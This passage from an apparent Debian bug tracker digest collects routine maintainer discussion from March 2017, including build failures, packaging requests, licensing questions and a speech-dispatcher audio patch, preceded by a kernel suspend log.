[399717.283256] wlp1s0: deauthenticating from 94:0c:6d:ac:34:c6 by local choice 
(Reason: 3=DEAUTH_LEAVING)
[399717.313542] IPv6: ADDRCONF(NETDEV_UP): wlp1s0: link is not ready
[399718.545879] PM: Syncing filesystems ... done.
[399718.567623] PM: Preparing system for sleep (mem)
[399718.568076] (NULL device *): firmware: direct-loading firmware 
iwlwifi-7260-17.ucode
[399718.568086] Freezing user space processes ... (elapsed 0.001 seconds) done.
[399718.569420] Freezing remaining freezable tasks ... (elapsed 0.001 seconds) 
done.
[399718.570548] PM: Suspending system (mem)
[399718.570558] Suspending console(s) (use no_console_suspend to debug)
[399718.592658] sd 0:0:0:0: [sda] Synchronizing SCSI cache
[399718.592807] sd 0:0:0:0: [sda] Stopping disk
[399718.709472] ACPI : EC: event blocked
[399722.614324] PM: suspend of devices complete after 4022.250 msecs
[399722.633820] PM: late suspend of devices complete after 19.489 msecs
[399722.634140] ACPI : EC: interrupt blocked
[399722.636570] xhci_hcd :00:14.0: System wakeup enabled by ACPI
[399722.673605] PM: noirq suspend of devices complete after 39.779 msecs
[399722.673936] ACPI: Preparing to enter system sleep state S3
[399722.674002] ACPI : EC: EC stopped
[399722.674003] PM: Saving platform NVS memory
[399722.674003] Disabling non-boot CPUs ...
[399722.674220] Broke affinity for irq 44
[399722.675507] smpboot: CPU 1 is now offline
[399722.676020] Broke affinity for irq 42
[399722.676022] Broke affinity for irq 44
[399722.677028] smpboot: CPU 2 is now offline
[399722.677481] Broke affinity for irq 1
[399722.677486] Broke affinity for irq 3
[399722.677495] Broke affinity for irq 7
[399722.677505] Broke affinity for irq 9
[399722.677509] Broke affinity for irq 10
[399722.677515] Broke affinity for irq 27
[399722.677519] Broke affinity for irq 28
[399722.677524] Broke affinity for irq 41
[399722.677526] Broke affinity for irq 42
[399722.677528] Broke affinity for irq 43
[399722.677530] Broke affinity for irq 44
[399722.678573] smpboot: CPU 3 is now offline
[399722.680827] ACPI: Low-level resume complete
[399722.680884] ACPI : EC: EC started
[399722.680885] PM: Restoring platform NVS memory
[399722.681202] Suspended for 143013.799 seconds
[399722.681261] Enabling non-boot CPUs ...
[399722.681317] x86: Booting SMP configuration:
[399722.681318] smpboot: Booting Node 0 Processor 1 APIC 0x1
[399722.684099]  cache: parent cpu1 should not be sleeping
[399722.684661] CPU1 is up
[399722.684783] smpboot: Booting Node 0 Processor 2 APIC 0x3
[399722.688220]  cache: parent cpu2 should not be sleeping
[399722.688771] CPU2 is up
[399722.688868] smpboot: Booting Node 0 Processor 3 APIC 0x2
[399722.692292]  cache: parent cpu3 should not be sleeping
[399722.692856] CPU3 is up
[399722.703574] ACPI: Waking up from system sleep state S3
[399722.703826] ACPI : EC: interrupt unblocked
[399722.723847] xhci_hcd :00:14.0: System wakeup disabled by ACPI
[399722.744029] PM: noirq resume of devices complete after 40.370 msecs
[399722.843852] PM: early resume of devices complete after 99.795 msecs
[399722.843946] ACPI : EC: event unblocked
[399722.844187] rtc_cmos 00:03: System wakeup disabled by ACPI
[399722.854108] sd 0:0:0:0: [sda] Starting disk
[399723.127853] usb 1-7: reset high-speed USB device number 2 using xhci_hcd
[399723.167080] ata1: SATA link up 6.0 Gbps (SStatus 133 SControl 300)
[399723.235941] ata1.00: configured for UDMA/133
[399723.274325] PM: resume of devices complete after 430.441 msecs
[399723.294928] haswell-pcm-audio haswell-pcm-audio: no context buffer need to 
restore!
[399723.294929] haswell-pcm-audio haswell-pcm-audio: no context buffer need to 
restore!
[399723.311815] haswell-pcm-audio haswell-pcm-audio: FW loaded, mailbox 

Bug#848198:

[Yao Wei]

However prebuilt Noto Color Emoji isn't in the original repository but in
Android source. The TTF in the repo is old greyscale Emoji. If that's
considered okay I can go that way.
On Mon, 6 Mar 2017 at 03:18 Anthony Wong  wrote:

> Hi,
>
> I wonder if we can skip building it from source and just package the
> pre-built font file provided by Google? Like what we are doing with Noto
> CJK font.
> The license of the font file is SIL Open Font License Version 1.1, as far
> as I check.
>
> Thanks,
> Anthony Wong
>

Bug#856905: feature request - bind9 json stats output

[tom]

Package: bind9
Version: 9.10

BIND with new 9.10 version supports JSON statistical output, but needs 
to be compiled with --with-libjson option. Is it possible to add this 
feature into the package as JSON format is popular nowadays and has less 
resource impact then XML.

Thank you very much!

Bug#856705: [dko...@debian.org: Bug#856705: graywolf: License violation]

[Dima Kogan]

Tim Edwards  writes:

> Well, it's pretty clear that the TimberWolf authors at Yale unabashedly
> plaigerized out of Numerical Recipes for their thesis work.  What you
> found is not particularly difficult to work around, as the single-value
> decomposition routines can be found in the GNU Scientific Library and
> should be reasonably easy to substitute.

Hi. Yeah, there're plenty of other (and better) SVD implementations.
They won't be a drop-in replacement, however because numerical recipes
uses a ridiculous matrix storage scheme:

typedef struct {
INTrows ;
INTcolumns ;
DOUBLE **m ;
} YMBOX, *YMPTR ;

I.e. each row (or column) of a matrix is stored in a separate chunk of
(usually dynamically-allocated) memory. This is stupid, and no other
library would do it this way. So to use other implementations you might
need to write a shim to convert formats. If you find a better way,
please let me know.


>  However, it feeds back into other matrix manipulation routines, so I
> cannot be sure how much of that was pulled from Numerical Recipies.
> This looks like finding a needle in a haystack to me. How did you find
> that bit of plaigerized code, and how would I go about flushing out
> any additional plaigerized sections of code?

I came across some other libraries that were doing a similar thing, and
then searched the Debian codebase (http://codesearch.debian.net) for
some unique-looking comments. Here I searched for

You must augment A with extra zero rows

I also searched for some other things that caught some other libraries,
but the above chunk of text is the only one I found in graywolf. What
you can do is to look at functions that use that YMPTR matrix
representation: anything that uses it is a candidate for being plucked
from the book.

Note that for some reason the utility code to support this matrix
representation IS in the public domain, as indicated in numerical
recipes copyright page linked in the bug report.


> I definitely want these out of the code base, especially as GNU
> alternatives are readily available.

Thank you very much.

Bug#856827: RFS: xfce4-equake-plugin/1.3.8.1-1 [QA]

[Jeroen van Aart]

Adam Borowski wrote:

On Sat, Mar 04, 2017 at 11:28:08PM -0800, Jeroen van Aart wrote:

I am looking for a sponsor for my package "xfce4-equake-plugin"

* Package name: xfce4-equake-plugin
  Version : 1.3.8.1-1



Changes since the last upload:

New upstream release: Closes: 856774
Migrated to use https to download earthquake data because USGS will
phase out or has phased out http access, see also: https://https.cio.gov
older versions of equake will stop working as a result


This bug looks like it should have a RC severity, you might bump it to
ensure the updated package makes it to stretch.

On the other hand, this version introduces a lot of gratuitous changes that
are unfit during the freeze.  One of regressions includes such a small
detail as failing to build on current unstable in a clean chroot.  Log
attached.


Thank you. I did look through the logs you sent and it appears it is
failing because libcurl development files are not present on your build
environment. This new version of the package needs libcurl in order to
use https. I neglected to add the relevant libcurl development package
to "Build-Depends".

I have fixed the problem as well as a lintian warning, and uploaded
version 1.3.8.1-2. If I missed something else please let me know.


configure:13366: checking curl/curl.h presence
conftest.c:36:23: fatal error: curl/curl.h: No such file or directory

configure:13366: checking for curl/curl.h
configure:13366: result: no

configure:15225: checking for libcurl >= 7.9.7
configure:15267: result: not found

Bug#856652: RFS: xpdf/3.0.4.real-4

[Sean Whitton]

control: noowner -1

Dear Svante,

On Sun, Mar 05, 2017 at 01:56:59AM +0100, Svante Signell wrote:
> On Sat, 2017-03-04 at 17:39 -0700, Sean Whitton wrote:
> > I'm not referring to currently known security issues.  I'm referring
> > to issues that are yet to be discovered.
> 
> OK, got it. Are you still interested to sponsor this package, now when
> you know about status quo? If so, I'll create an account at
> alioth.debian.org and we'll continue from there.

I was hoping that you could provide a counter-argument to allay my
concerns about security.  Since you don't seem to have a response to the
issues I've raised, I wouldn't be comfortable uploading xpdf.

> Just a sidenote: I've been using xpdf myself for many years, and found
> it a nice piece of standalone software. I'd really be sad to see it
> disappear from Debian. My search for good alternatives has not been
> successful so far. One issue is that I don't need is to edit the
> pdf. I don't even know if xpdf supports that?

Have you tried okular?

Anyway, thanks again for getting involved with this orphaned package.

-- 
Sean Whitton


signature.asc
Description: PGP signature

Bug#852302: ipxe-qemu: Crash with QEMU newer than 2.6

[Charles Malaheenee]

H-m, after last update of Qemu (1:2.8+dfsg-3) suddenly it works. We'll keep an 
eye on it.

-- 
Best Regards,
Charles Malaheenee

Bug#850855: [rtkit] rtkit daemon fails to start

[Michael Biebl]

On Fri, 20 Jan 2017 11:38:54 -0300 Felipe Sateler 
wrote:
> Control: tags -1 - unreproducible moreinfo
> Control: reassign -1 systemd
> Control: affects -1 rtkit
> Control: retitle -1 Units with PrivateTmp fail when /var is a symlink
> Control: severity -1 normal
> 
> On 12 January 2017 at 04:46, Bogdan Vatra  wrote:
> > Hi,
> >
> >  I have an update, some time ago (~1year) I run out of space on my system
> > partition and I decide to move /var folder to another partition and symlink 
> > it
> > back to / partition. Today I just moved back my var folder and rtkit daemon
> > started to work ... :)
> 
> This is a bug in systemd. A related issue is
> https://github.com/systemd/systemd/issues/3867 , but that is
> supposedly fixed in 232. BogDan, do you have version 232 installed? It
> may be that the issue is not fully fixed yet.

If /var is a relative symlink to say mnt/var, it seems to work fine.
If /var is an absolute symlink to /mnt/var, rtkit-daemon fails to start
(complaining about /var/run/dbus/system_bus_socket not being available).
Tested with 232-18.

That all said, I'm not sure if supporting such a setup is actually worth it.
If you need to move /var to a separate location, ideally you make it a
separate mount point. If that is not possible, I would suggest you bind
mount the directory. This works fine.

Felipe, do you think this is worth investigating and spending time on?


-- 
Why is it that all of the instruments seeking intelligent life in the
universe are pointed away from Earth?



signature.asc
Description: OpenPGP digital signature

Bug#792639: apt-listbugs: should use https to access bug tracking system

[Guilhem Moulin]

First of, apologizes for opening duplicate #856844…  I apparently
overlooked this one while browsing though the list of existing bug
reports :-/

On Thu, 30 Jul 2015 at 22:35:17 +0200, Francesco Poli wrote:
> Now, the bad news is that I remembered that the libruby module
> providing SSL support links with libssl. And the OpenSSL license is
> well known to be GPL-incompatible.
> apt-listbugs is GPL-licensed and loads a number of GPL-licensed Ruby
> libraries: as a consequence, there may be license incompatibility
> issues preventing the distribution of a version of apt-listbugs which
> uses SSL.
> This licensing issue needs to be carefully investigated.
> I will try and see what can be done about it.
> Sadly, I will have to put the patch aside, until this situation is
> solved for the best.

FYI a similar issue (dynamic linking against libssl in the context of
python-pypump) was brought up to debian-legal two years ago:

https://lists.debian.org/debian-legal/2015/01/msg00020.html
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=740990
https://github.com/xray7224/PyPump/issues/101

“OK. It can't hurt to try - this does seem like a special case.”  The
FTP masters didn't reject the GPL-3+'ed (without OpenSSL exception)
code:

https://tracker.debian.org/media/packages/p/python-pypump/copyright-0.7-1


An older thread on debian-python mentioning the same problem:

https://lists.debian.org/debian-python/2011/03/msg00082.html
In my case I am talking about a GPLv3+ package that exists in Debian --
kupfer

Where do I draw the line for using/linking against ssl?

a) Using Python2.6
b) Unintentionally introducing _ssl or ssl into the imported modules
   (import any of urllib, httplib, socket etc!)
c) Unintentionally using ssl  (use urllib.urlopen on URL provided by
   user -- if it's https we are using openssl)
d) Intentionally using ssl (import ssl and use
   httplib.HTTPSConnection and verify certificates)

Kupfer is today at (c) in the debian archive. It exists in
development version at (d).

(AFAICT apt-listbugs would be at (b).)  The kupfer package is still in
main, released under GPL-3+ (without OpenSSL exception):

https://tracker.debian.org/media/packages/k/kupfer/copyright-0%2Bv208-6

-- 
Guilhem.


signature.asc
Description: PGP signature

Bug#856904: ksirk FTBFS on architectures where char is unsigned

[Adrian Bunk]

Source: ksirk
Version: 4:16.04.0-1
Severity: serious

https://buildd.debian.org/status/package.php?p=ksirk=sid

...
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
/«PKGBUILDDIR»/ksirk/iris/src/xmpp/base64/base64.cpp:65:2: error: narrowing 
conversion of '-1' from 'int' to 'char' inside { } [-Wnarrowing]
...

Bug#856903: gcj-6: Broken ecj1 symlink on i386

[Adrian Bunk]

Package: gcj-6
Version: 6.3.0-8
Severity: serious
Control: affects -1 src:pdftk

The latest pdftk binNMU FTBFS on i386:
https://buildd.debian.org/status/package.php?p=pdftk=sid

The relevant part of the build log is:
gcj: error trying to exec 'ecj1': execvp: No such file or directory

gcj-6 contains the following symlink:
/usr/lib/gcc/i686-linux-gnu/6/ecj1 -> ../../../i686-linux-gnu/gcc/ecj1

The actual location of ecj1 is:
/usr/lib/i386-linux-gnu/gcc/ecj1

Bug#856891: hitori: Drop obsolete menu and .xpm

[Jeremy Bicha]

Control: forwarded -1 https://bugzilla.gnome.org/731060

On closer examination, I believe the .xpm icon isn't the problem for
showing up in the Software app. The problem is that Hitori's app icon
is only 48x48 but it needs to be 64x64 or higher.

Thanks,
Jeremy Bicha

Bug#458829: RFP: libresonic -- a web based media stream server

[Petter Reinholdtsen]

unarchive 458829
reopen 458829
retitle 458829 RFP: libresonic -- a web based media stream server
thanks

The subsonic project has been closed sourced, and a free software fork
is now named libresonic.  It is available from http://libresonic.org >.

There is also a later WNPP request for the same package in
https://bugs.debian.org/592440 >, but I thought it was best to
pick the original. :)

-- 
Happy hacking
Petter Reinholdtsen

Bug#856769: Pending fixes for bugs in the sweethome3d package

[pkg-java-maintainers]

tag 856769 + pending
thanks

Some bugs in the sweethome3d package are closed in revision
2ea51e02e05a88c5326a79a1682e8da7482eb787 in branch 'master' by Markus
Koschany

The full diff can be seen at
https://anonscm.debian.org/cgit/pkg-java/sweethome3d.git/commit/?id=2ea51e0

Commit message:

Remove Gabriele Giacone from Uploaders and add myself to it.

Closes: #856769

Bug#854030: Pending fixes for bugs in the sweethome3d package

[pkg-java-maintainers]

tag 854030 + pending
thanks

Some bugs in the sweethome3d package are closed in revision
387805e5c19cba3ee0691f991a45d9b1e94fac84 in branch 'master' by Markus
Koschany

The full diff can be seen at
https://anonscm.debian.org/cgit/pkg-java/sweethome3d.git/commit/?id=387805e

Commit message:

Add -Dsun.java2d.opengl=true to startup script.

Closes: #854030

Bug#856902: passwd: typos for subuids/subgids long options in usermod(8) man page

[nfb]

Package: passwd
Version: 1:4.4-4
Severity: minor

Dear Maintainer,

The usermod(8) man page contains wrong long options for uids/gids
related actions. We read:

[add|del]-sub-[uids|gids]

while it should be:

[add|del]-sub[uids|gids]

(there is an extra hyphen after 'sub')


Thanks for your time.


-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-1-amd64 (SMP w/8 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages passwd depends on:
ii  libaudit1   1:2.6.7-1
ii  libc6   2.24-9
ii  libpam-modules  1.1.8-3.5
ii  libpam0g1.1.8-3.5
ii  libselinux1 2.6-3
ii  libsemanage12.6-2

passwd recommends no packages.

passwd suggests no packages.

-- no debconf information

Bug#856901: chromium doesn't start with "version LIBAVCODEC_57 not defined"

[Ara Keary]

Package: chromium
Version: 56.0.2924.76-5
Severity: grave
Justification: renders package unusable

Dear maintainers,

starting chromium fails on 56.0.2924.76-5 ; starting from command line yields

/usr/lib/chromium/chromium: relocation error: /usr/lib/chromium/chromium:
symbol avcodec_parameters_to_context, version LIBAVCODEC_57 not defined in file
libavcodec.so.57 with link time reference

and no process is started.

Reverting to testing 56.0.2924.76-4 also fails
Only the stable version starts.
The problem seems to have appeared in v56.

Best,

Ara



-- System Information:
Debian Release: 9.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-2-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages chromium depends on:
ii  libasound2   1.1.3-5
ii  libatk1.0-0  2.22.0-1
ii  libavcodec57 10:3.0-dmo4
ii  libavformat5710:3.0-dmo4
ii  libavutil55  10:3.0-dmo4
ii  libc62.24-9
ii  libcairo21.14.8-1
ii  libcups2 2.2.1-8
ii  libdbus-1-3  1.10.16-1
ii  libevent-2.0-5   2.0.21-stable-3
ii  libexpat12.2.0-2
ii  libflac8 1.3.2-1
ii  libfontconfig1   2.11.0-6.7+b1
ii  libfreetype6 2.6.3-3+b2
ii  libgcc1  1:6.3.0-8
ii  libgdk-pixbuf2.0-0   2.36.5-2
ii  libglib2.0-0 2.50.3-1
ii  libgtk2.0-0  2.24.31-2
ii  libharfbuzz0b1.4.2-1
ii  libicu57 57.1-5
ii  libjpeg62-turbo  1:1.5.1-2
pn  libminizip1  
ii  libnspr4 2:4.12-6
ii  libnss3  2:3.26.2-1
ii  libpango-1.0-0   1.40.4-1
ii  libpangocairo-1.0-0  1.40.4-1
ii  libpng16-16  1.6.28-1
ii  libpulse010.0-1
ii  libre2-3 20170101+dfsg-1
ii  libsnappy1v5 1.1.4-1
ii  libstdc++6   6.3.0-8
ii  libvpx4  1.6.1-2
ii  libwebp6 0.5.2-1
ii  libwebpdemux20.5.2-1
ii  libx11-6 2:1.6.4-3
ii  libx11-xcb1  2:1.6.4-3
ii  libxcb1  1.12-1
ii  libxcomposite1   1:0.4.4-2
ii  libxcursor1  1:1.1.14-1+b1
ii  libxdamage1  1:1.1.4-2+b1
ii  libxext6 2:1.3.3-1
ii  libxfixes3   1:5.0.3-1
ii  libxi6   2:1.7.9-1
ii  libxml2  2.9.4+dfsg1-2.2
ii  libxrandr2   2:1.5.1-1
ii  libxrender1  1:0.9.10-1
ii  libxslt1.1   1.1.29-2
ii  libxss1  1:1.2.2-1
ii  libxtst6 2:1.2.3-1
ii  x11-utils7.7+3+b1
ii  xdg-utils1.1.1-1
ii  zlib1g   1:1.2.8.dfsg-5

Versions of packages chromium recommends:
ii  fonts-liberation  1:1.07.4-2

Versions of packages chromium suggests:
pn  chromium-driver
pn  chromium-l10n  
pn  chromium-shell 
pn  chromium-widevine  

-- no debconf information

Bug#831585: tcpreen: please make the build reproducible

[Daniel Shahaf]

Adrian Bunk wrote on Sun, Mar 05, 2017 at 23:52:15 +0200:
> On Sun, Jul 17, 2016 at 03:56:24PM +0200, Chris Lamb wrote:
> >...
> > +--- tcpreen-1.4.4.orig/m4/hostname.m4
> >  tcpreen-1.4.4/m4/hostname.m4
> > +@@ -5,7 +5,7 @@ dnl From Remi Denis-Courmont
> > + AC_DEFUN([RDC_BUILD_HOSTNAME],
> > + [AC_CACHE_CHECK([for build hostname],
> > + rdc_cv_build_hostname,
> > +-[rdc_cv_build_hostname=`hostname -f 2>/dev/null || uname -n 2>/dev/null 
> > || hostname 2>/dev/null || echo "unknown"`

Tangentially, the original line seems unportable: on Solaris, 'hostname
-f' sets the hostname to "-f" and succeeds (without trying the three
other alternatives).

Cheers,

Daniel

Bug#841935: pbuilder: incorrect permissions on /dev/ptmx breaks openpty()

[Thorsten Glaser]

James Clarke dixit:

>the host's /dev/pts. I would love to see newinstance working, but I tried it
>once and couldn't get it to work, especially with "pbuilder login". Someone

I’d also be seriously annoyed if my C hook running a shell if the
build failed would stop working. (On that note, apparently it started
working as an A hook recently, thanks for that even though --bin-nmu
is about the only thing I needed A hooks for so far.)

bye,
//mirabilos
-- 
Stéphane, I actually don’t block Googlemail, they’re just too utterly
stupid to successfully deliver to me (or anyone else using Greylisting
and not whitelisting their ranges). Same for a few other providers such
as Hotmail. Some spammers (Yahoo) I do block.

Bug#856887: sddm default configuration is not properly taken

[Maximiliano Curia]

Control: tag -1 - upstream

¡Hola Miguel!

El 2017-03-05 a las 21:26 +0100, Miguel Angel escribió:
Package: sddm 
Version: 0.13.0-1 
Severity: important 
Tags: upstream


sddm default "blue configuration" is not taking properly when the 
packages is upgraded to version 0.14 or above (bad theme and wrong 
configuration)


Downgrading to version 0.13 makes sddm usable again with the 
default theme properly setup.


The default theme in 0.14 is "debian-theme" that is an alternative, sadly the 
breeze theme that ships the corresponding theme hasn't been uploaded yet.


Curious thing is when you lock your screen 
with 0.14, the right blue default theme is displayed (?), but not in the logout.


Locking the screen has nothing to do with sddm, it's handled by a different 
program that happens to use the breeze theme.


Happy hacking,
--
"Any change looks terrible at first." -- Principle of Design Inertia
Saludos /\/\ /\ >< `/


signature.asc
Description: PGP signature

Bug#856883: important

[Bastien ROUCARIES]

control: severity -1 important
control: tags -1 +wontfix

webp is disable under debian

Bug#856900: unblock: speech-dispatcher/0.8.6-4

[Samuel Thibault]

Sorry, I had the debdiff ready, but forgot to attach, here it is.

Samuel
diff -Nru speech-dispatcher-0.8.6/debian/changelog 
speech-dispatcher-0.8.6/debian/changelog
--- speech-dispatcher-0.8.6/debian/changelog2017-02-04 10:59:22.0 
+0100
+++ speech-dispatcher-0.8.6/debian/changelog2017-03-05 23:13:08.0 
+0100
@@ -1,3 +1,9 @@
+speech-dispatcher (0.8.6-4) unstable; urgency=medium
+
+  * Fix stripped audio output of flite module (Closes: #856895).
+
+ -- Samuel Thibault   Sun, 05 Mar 2017 23:13:08 +0100
+
 speech-dispatcher (0.8.6-3) unstable; urgency=medium
 
   [ Samuel Thibault ]
diff -Nru speech-dispatcher-0.8.6/debian/patches/flite-strip-silence 
speech-dispatcher-0.8.6/debian/patches/flite-strip-silence
--- speech-dispatcher-0.8.6/debian/patches/flite-strip-silence  1970-01-01 
01:00:00.0 +0100
+++ speech-dispatcher-0.8.6/debian/patches/flite-strip-silence  2017-03-05 
23:12:16.0 +0100
@@ -0,0 +1,45 @@
+--- a/src/modules/flite.c
 b/src/modules/flite.c
+@@ -238,21 +238,29 @@ int module_close(void)
+ 
+ void flite_strip_silence(AudioTrack * track)
+ {
+-  int playlen, skip;
++  assert(track->bits == 16);
++  unsigned i;
++  float silence_limit = 0.001;
+ 
+-  float stretch =
+-  get_param_float(flite_voice->features, "duration_stretch", 1.);
+-  int speed = (int)(1000. / stretch);
+-  skip = (187 * track->sample_rate) / speed;
+-  playlen = track->num_samples - skip * 2;
+-  if (playlen > 0 && playlen < 500)
+-  playlen += (skip * 2) / 3;
+-  if (playlen < 0)
+-  playlen = 0;
++  while (track->num_samples >= track->num_channels) {
++  for (i = 0; i < track->num_channels; i++)
++  if (abs(track->samples[i])
++  >= silence_limit * (1L<<(track->bits-1)))
++  goto stripped_head;
++  track->samples += track->num_channels;
++  track->num_samples -= track->num_channels;
++  }
++stripped_head:
+ 
+-  track->num_samples = playlen;
+-  assert(track->bits == 16);
+-  track->samples += skip * track->num_channels;
++  while (track->num_samples >= track->num_channels) {
++  for (i = 0; i < track->num_channels; i++)
++  if (abs(track->samples[track->num_samples - i - 1])
++  >= silence_limit * (1L<<(track->bits-1)))
++  goto stripped_tail;
++  track->num_samples -= track->num_channels;
++  }
++stripped_tail:
++  ;
+ }
+ 
+ void *_flite_speak(void *nothing)
diff -Nru speech-dispatcher-0.8.6/debian/patches/series 
speech-dispatcher-0.8.6/debian/patches/series
--- speech-dispatcher-0.8.6/debian/patches/series   2017-02-04 
08:13:39.0 +0100
+++ speech-dispatcher-0.8.6/debian/patches/series   2017-03-05 
22:50:12.0 +0100
@@ -1,3 +1,4 @@
 pulse-default-latency.patch
 doc-figures
 change-default-module.patch
+flite-strip-silence

Bug#856900: unblock: speech-dispatcher/0.8.6-4

[Samuel Thibault]

Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: unblock

Hello,

A user reported on #856895 that the speech-dispatcher-flite module
systematically strips the end of speech syntheses, while other modules
do work fine.  That makes the flite module barely usable since some
important information may then be missing, which is more than important
when used by a screen reader for a blind user.

Digging a bit, I found that the flite module intentionally strips part
of the synthesis, to drop the silence at beginning and end of the
synthesis (which is indeed not neglectable). This is done with an ad-hoc
cryptic sloppy formula. In the patch I have uploaded, I replaced it with
a mere loop that simply looks for heading and trailing silence (detected
as being less than 0.1% volume). The result is as snappy as user expect,
and way more robust.

Samuel

unblock speech-dispatcher/0.8.6-4

-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable-debug'), (500, 
'testing-debug'), (500, 'buildd-unstable'), (500, 'unstable'), (500, 'stable'), 
(500, 'oldstable'), (1, 'experimental-debug'), (1, 'buildd-experimental'), (1, 
'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.10.0 (SMP w/4 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

-- 
Samuel
"...Unix, MS-DOS, and Windows NT (also known as the Good, the Bad, and
the Ugly)."
(By Matt Welsh)
diff -Nru speech-dispatcher-0.8.6/debian/changelog 
speech-dispatcher-0.8.6/debian/changelog
--- speech-dispatcher-0.8.6/debian/changelog2017-02-04 10:59:22.0 
+0100
+++ speech-dispatcher-0.8.6/debian/changelog2017-03-05 23:13:08.0 
+0100
@@ -1,3 +1,9 @@
+speech-dispatcher (0.8.6-4) unstable; urgency=medium
+
+  * Fix stripped audio output of flite module (Closes: #856895).
+
+ -- Samuel Thibault   Sun, 05 Mar 2017 23:13:08 +0100
+
 speech-dispatcher (0.8.6-3) unstable; urgency=medium
 
   [ Samuel Thibault ]
diff -Nru speech-dispatcher-0.8.6/debian/patches/flite-strip-silence 
speech-dispatcher-0.8.6/debian/patches/flite-strip-silence
--- speech-dispatcher-0.8.6/debian/patches/flite-strip-silence  1970-01-01 
01:00:00.0 +0100
+++ speech-dispatcher-0.8.6/debian/patches/flite-strip-silence  2017-03-05 
23:12:16.0 +0100
@@ -0,0 +1,45 @@
+--- a/src/modules/flite.c
 b/src/modules/flite.c
+@@ -238,21 +238,29 @@ int module_close(void)
+ 
+ void flite_strip_silence(AudioTrack * track)
+ {
+-  int playlen, skip;
++  assert(track->bits == 16);
++  unsigned i;
++  float silence_limit = 0.001;
+ 
+-  float stretch =
+-  get_param_float(flite_voice->features, "duration_stretch", 1.);
+-  int speed = (int)(1000. / stretch);
+-  skip = (187 * track->sample_rate) / speed;
+-  playlen = track->num_samples - skip * 2;
+-  if (playlen > 0 && playlen < 500)
+-  playlen += (skip * 2) / 3;
+-  if (playlen < 0)
+-  playlen = 0;
++  while (track->num_samples >= track->num_channels) {
++  for (i = 0; i < track->num_channels; i++)
++  if (abs(track->samples[i])
++  >= silence_limit * (1L<<(track->bits-1)))
++  goto stripped_head;
++  track->samples += track->num_channels;
++  track->num_samples -= track->num_channels;
++  }
++stripped_head:
+ 
+-  track->num_samples = playlen;
+-  assert(track->bits == 16);
+-  track->samples += skip * track->num_channels;
++  while (track->num_samples >= track->num_channels) {
++  for (i = 0; i < track->num_channels; i++)
++  if (abs(track->samples[track->num_samples - i - 1])
++  >= silence_limit * (1L<<(track->bits-1)))
++  goto stripped_tail;
++  track->num_samples -= track->num_channels;
++  }
++stripped_tail:
++  ;
+ }
+ 
+ void *_flite_speak(void *nothing)
diff -Nru speech-dispatcher-0.8.6/debian/patches/series 
speech-dispatcher-0.8.6/debian/patches/series
--- speech-dispatcher-0.8.6/debian/patches/series   2017-02-04 
08:13:39.0 +0100
+++ speech-dispatcher-0.8.6/debian/patches/series   2017-03-05 
22:50:12.0 +0100
@@ -1,3 +1,4 @@
 pulse-default-latency.patch
 doc-figures
 change-default-module.patch
+flite-strip-silence

Bug#855788: 855788 severity

[Thomas Liske]

tags 855788 more-info upstream
thanks


Hi pabs,


Paul Wise  writes:

> On Thu, 2017-03-02 at 23:30 +0100, Yann Dirson wrote:
>
>> FWIW, no such problem here. Is that high severity really warranted ?
>
> The package is not working for me at all. I assumed that the reason

the package's core functionally is the needrestart-session command - does
it working for you?

Could you please also try to run the dbus registration manually?

/usr/lib/needrestart-session/needrestart-dbus-session

The command should not return. Please provide any syslog entries... if
it would work you should see something like:

Mar  5 23:20:14 clempner needrestart-dbus-session[31046]: 
needrestart-dbus-session 2.11 launched
Mar  5 23:20:14 clempner needrestart-dbus-session[31046]: entering event loop...


TIA,
Thomas


> no-one else reported the same issue was that no-one else was using the
